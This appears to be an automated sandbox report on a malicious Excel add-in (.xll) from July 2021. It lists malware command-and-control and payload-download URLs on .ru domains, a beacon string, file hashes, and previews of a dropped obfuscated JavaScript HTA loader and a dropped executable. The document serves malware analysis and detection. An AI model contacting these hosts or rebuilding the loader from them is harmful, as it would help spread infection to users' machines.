https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
http://thentabecon.ru/8/forum.php | 0% | Avira URL Cloud | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
http://anspossthrly.ru/8/forum.php | 0% | Avira URL Cloud | safe
http://srand04rf.ru | 0% | Avira URL Cloud | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png8 | 0% | Avira URL Cloud | safe
http://srand04rf.ru/08.jpg | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | URL Reputation | safe

        Domains and IPs

        Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com | 23.21.173.155 | true | false | | high
srand04rf.ru | 8.211.241.0 | true | true | | unknown
sudepallon.com | 77.222.42.67 | true | true | | unknown
api.ipify.org | unknown | unknown | false | | high

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://api.ipify.org/ | false | | high
http://thentabecon.ru/8/forum.php | true | Avira URL Cloud: safe | unknown
http://anspossthrly.ru/8/forum.php | true | Avira URL Cloud: safe | unknown
http://srand04rf.ru/08.jpg | true | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://login.microsoftonline.com/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://shell.suite.office.com:1443 | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0708_5355150121.xll | true | Avira URL Cloud: safe | unknown
https://autodiscover-s.outlook.com/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://cdn.entity. | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://powerlift.acompli.net | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://cortana.ai | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://api.aadrm.com/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://api.microsoftstream.com/api/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://cr.office.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp; powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp | false | | high
http://srand04rf.ru/08 | powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://portal.office.com/account/?ref=ClientMeControl | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp; powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmp | false | | high
https://graph.ppe.windows.net | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://tasks.office.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://store.office.cn/addinstemplate | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | true | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | false | | high
https://go.micro | powershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmp | true | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://globaldisco.crm.dynamics.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://contoso.com/Icon | powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp | true | URL Reputation: safe | unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://store.officeppe.com/addinstemplate | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://web.microsoftstream.com/video/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://graph.windows.net | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://dataservice.o365filtering.com/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | false | | high
https://officesetup.getmicrosoftkey.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://ncus.contentsync. | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
http://weather.service.msn.com/data.aspx | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://apis.live.net/v5.0/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
http://srand04rf.ru | powershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://management.azure.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://wus2.contentsync. | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | URL Reputation: safe | unknown
https://incidents.diagnostics.office.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID | snd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp | true | Avira URL Cloud: safe | low
https://clients.config.office.net/user/v1.0/ios | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
http://ocsp.sectigo.com0 | 0708_5355150121.xll | true | URL Reputation: safe | unknown
https://insertmedia.bing.office.net/odc/insertmedia | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://o365auditrealtimeingestion.manage.office.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://contoso.com/License | powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp | true | URL Reputation: safe | unknown
https://outlook.office365.com/api/v1.0/me/Activities | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://api.office.net | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://incidents.diagnosticssdf.office.com | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | false | | high
https://asgsmsproxyapi.azurewebsites.net/ | F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | true | Avira URL Cloud: safe | unknown
                                                                                                                          https://clients.config.office.net/user/v1.0/android/policiesF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                            high
                                                                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0708_5355150121.xlltrue
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://entitlement.diagnostics.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                              high
                                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                high
                                                                                                                                https://substrate.office.com/search/api/v2/initF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://outlook.office.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                    high
                                                                                                                                    http://pesterbdd.com/images/Pester.png8powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmptrue
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://storage.live.com/clientlogs/uploadlocationF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://templatelogging.office.com/client/logF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://outlook.office365.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://webshell.suite.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://contoso.com/powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmptrue
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://management.azure.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://login.windows.net/common/oauth2/authorizeF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
23.21.173.155 | elb097307-934924932.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
77.222.42.67 | sudepallon.com | Russian Federation | 44112 | SWEB-ASRU | true
8.211.241.0 | srand04rf.ru | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 445958
Start date: 08.07.2021
Start time: 16:29:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 20s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 0708_5355150121.xll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLL@10/11@4/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 3% (good quality ratio 2.9%)
• Quality average: 88.5%
• Quality standard deviation: 21.2%
HCA Information:
• Successful, ratio: 75%
• Number of executed functions: 59
• Number of non-executed functions: 76
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xll
Warnings:
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.42.151.234, 13.88.21.125, 52.109.88.177, 52.109.12.21, 52.147.198.201, 20.82.210.154, 2.20.84.85, 51.103.5.186, 20.82.209.183, 95.101.22.134, 95.101.22.125, 40.112.88.60, 92.122.145.220
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
16:30:52 | API Interceptor | 50x Sleep call for process: powershell.exe modified
16:31:54 | API Interceptor | 91x Sleep call for process: snd32sys.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
23.21.173.155 | file.doc | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.dll | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.dll | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.doc | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.dll | malicious | api.ipify.org/?format=xml
23.21.173.155 | file.dll | malicious | api.ipify.org/?format=xml
77.222.42.67 | triage_dropped_file.dll | malicious | mancause.ru/8/forum.php
77.222.42.67 | nimb.dll | malicious | mancause.ru/8/forum.php
77.222.42.67 | 0706_1050501748839.doc | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.dll | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.doc | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.doc | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.dll | malicious | mancause.ru/8/forum.php
77.222.42.67 | file.doc | malicious | mancause.ru/8/forum.php

Domains

Match | Associated Sample Name / URL | Detection | Context
elb097307-934924932.us-east-1.elb.amazonaws.com | OTzccW5OZg.exe | malicious | 50.16.226.23
elb097307-934924932.us-east-1.elb.amazonaws.com | ve88CBNzQZ.dll | malicious | 50.16.216.118
elb097307-934924932.us-east-1.elb.amazonaws.com | triage_dropped_file.dll | malicious | 54.235.175.90
elb097307-934924932.us-east-1.elb.amazonaws.com | nimb.dll | malicious | 50.16.216.118
elb097307-934924932.us-east-1.elb.amazonaws.com | 0706_1050501748839.doc | malicious | 50.16.216.118
elb097307-934924932.us-east-1.elb.amazonaws.com | file.dll | malicious | 23.21.136.132
elb097307-934924932.us-east-1.elb.amazonaws.com | file.doc | malicious | 23.21.211.162
elb097307-934924932.us-east-1.elb.amazonaws.com | file.doc | malicious | 23.21.136.132
elb097307-934924932.us-east-1.elb.amazonaws.com | file.dll | malicious | 54.235.121.178
elb097307-934924932.us-east-1.elb.amazonaws.com | file.doc | malicious | 50.16.246.238
elb097307-934924932.us-east-1.elb.amazonaws.com | 0706_1715044809783.doc | malicious | 54.235.175.90
elb097307-934924932.us-east-1.elb.amazonaws.com | niberius.dll | malicious | 50.16.218.217
elb097307-934924932.us-east-1.elb.amazonaws.com | nimb.dll | malicious | 54.225.78.40
elb097307-934924932.us-east-1.elb.amazonaws.com | 4h2yLkN8DO.dll | malicious | 23.23.104.250
elb097307-934924932.us-east-1.elb.amazonaws.com | TejsR02giJ.exe | malicious | 50.16.216.118
elb097307-934924932.us-east-1.elb.amazonaws.com | juON02msHS.dll | malicious | 23.23.104.250
                                                                                                                                                  B6tFTmWwt8.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  Y0Cc092A1t.exeGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  02ZEulFtpQ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.121.178
                                                                                                                                                  triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  srand04rf.ruaCWkTdaR6G.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  0616_433887484261.docGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  omsh.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  omsh_.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  omh.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  0616_1338797754728.docGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208

                                                                                                                                                  ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\Public\res32.hta
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 8419
Entropy (8bit): 5.163512636419693
Encrypted: false
SSDEEP: 192:/arm5dHoAR5V98geGR4qUg3fjRORjkSRQvRIPLBaGxmBWzMIAlPoP8L7T:/audHjf98lRqTP9UgYCGNaGxmNDlo8L3
MD5: 71999A9D2F15E164C9B1FA926AA6444B
SHA1: C1FBD2B6458B474A208B6CC710951940C9290E5C
SHA-256: DA92436D2BBCDEF52B11ACE6E2E063E9971CEFC074D194550BD425305C97CDD5
SHA-512: 298EAAB6D157E81BB738B1605285A0D14B05AE3656F1BBF72C4921C78B74BE7048B6744144469CB4EF48F4D4D233F794C366F192765A4F193C48B2DE2EFF4C27
Malicious: true
Reputation: low
                                                                                                                                                  Preview: <!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >....<html>..<body>....<script language="javascript">..var _0x8c86 = [.. 'W6RcUHHOW4dcUSocyZGj',.. 'WQBdGaO7WPqZW73dIq',.. 'W4pcLqKgyCkGaaHJW6O',.. 'W4hcOqzBnmo7W7HC',.. 'bWFcVWmEW4fSxsldUSoKWPW',.. 'WQxcUs0tWQG2W74',.. 'yfC1W6BcPef7W6ldJdu',.. 'WPVcJSoCnHyuWRNdHmkHWPbYWQK',.. 'W57cKCoKiCkGW5/cPZrZmW',.. 'WQxdHxzcW7WBW4BdVqnvWPm',.. 'W5NdTCklAg8dWPhdPSk0WR9JWQ3cLSo4WPpdN2O',.. 'zg5jW70/wJ1eW4lcOK/cHG',.. 'WPbyBmoUWPDzkblcJWHYcq',.. 'W7ldUt/cN8kdWPNcQty',.. 'aahdHuTHWP9DqG',.. 'WQdcMbi8WOSxW7q',.. 'W7iQnmo+DCkVzSoc',.. 'W5WHrvJcTmoFEw/cRSolcmo5mmoI',.. 'k8ofemkaW5PbzczLlcXQ',.. 'W7hdUMpdHCo8W5FcKHqqye9M',.. 'a8opcSkonCkOrq',.. 'WPb5WQVdV0hcQSk7W58',.. 'y1DLWRxcKe1oW6a',.. 'W53cKSoPk8oPW5dcLdzuiCk+',.. 'W48dx8kNWPVdIXzeiSoDW6RdMmk4WOZcGmkqgd7dKCk/WR7cLSoQWRL6W4XRee3dKmopiL3cMJm5iCkgW67cMLuxW73cMrldNCkvCfZdKCo5zmolW5tcJvdcISoLW6ONW77dS8k4tm
                                                                                                                                                  C:\Users\Public\snd32sys.exe
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 763392
Entropy (8bit): 6.644646436393566
Encrypted: false
SSDEEP: 12288:4AbvaOTfFGikmS6jd2QML8HXWp8KEwbHBkm9jjgbFHLViv0dC2x0uTadTaUk7u:vbvJfFGikmS0pXfw7Bkm9j088PlTaDj
MD5: ED1921467F6784AF6BDCA40A06A541B5
SHA1: 63B70725C3298D5FA17277EC64C77A4B6FBCF697
SHA-256: 3DB14214A9EB98B3B5ABFFCB314C808A25ED82456CE01251D31E8EA960F6E4E6
SHA-512: A30779D84521049F4CEBA11B0F0B16430DB8A38FF38AB540585C9AE89D7214655E0C5C246E21E97AB65D8F3DC0D472DDB8BDA1E01AF82E632C66A2CCD159F020
Malicious: true
Reputation: low
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c..m...m...m......m.......m......m......m...m...m......m......m.......m..Rich.m..................PE..L....<.`.................b...................................................p......W.....@..................................u..........@.................... ..@G..p9..T............................9..@............................................text....`.......b.................. ..`.rdata..P............f..............@..@.data............^...l..............@....rsrc...@...........................@..@.reloc..@G... ...H...^..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F2E779D9-2A7F-4724-B0D9-67BDDA1F0003
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 135209
Entropy (8bit): 5.363084368102766
Encrypted: false
SSDEEP: 1536:qcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:MEQ9DQW+zwXO1
MD5: 585F16F872D700ED9074C9599BFCAA8D
SHA1: A7B0CEC26282A4EBDD6B8A336B6C922EB7CCB546
SHA-256: 27F46B4BD834974CEEC3353473B97BCF16BD3AF5FBD14BEC8340D2B8048BA237
SHA-512: 94B68F6C6BF74CFCE8CF9D3E908EB674EDF0F93B097885301BF60B6D536BC38FB596DE3047142BCBF8F879FC417632F11B4BDCAFB8C4C4C8AFBCB1BCDF34C73C
Malicious: false
Reputation: low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-07-08T14:30:08">.. Build: 16.0.14306.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17512
                                                                                                                                                  Entropy (8bit):5.575682556842605
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:qtpOrhtOomtrzRkSBKnKileIoK7Q99gtSJQpO1ViYbR:H4KKiler98tRC7l
                                                                                                                                                  MD5:804765CA20FB452B7AFDC20F54DDC5BC
                                                                                                                                                  SHA1:1E475060FAC7DC9546B6DF29B78D139485F5E105
                                                                                                                                                  SHA-256:1E64FB0B2717B6E64DC2C096EF0169206D5C25A854760C212FBA76EF5E362E51
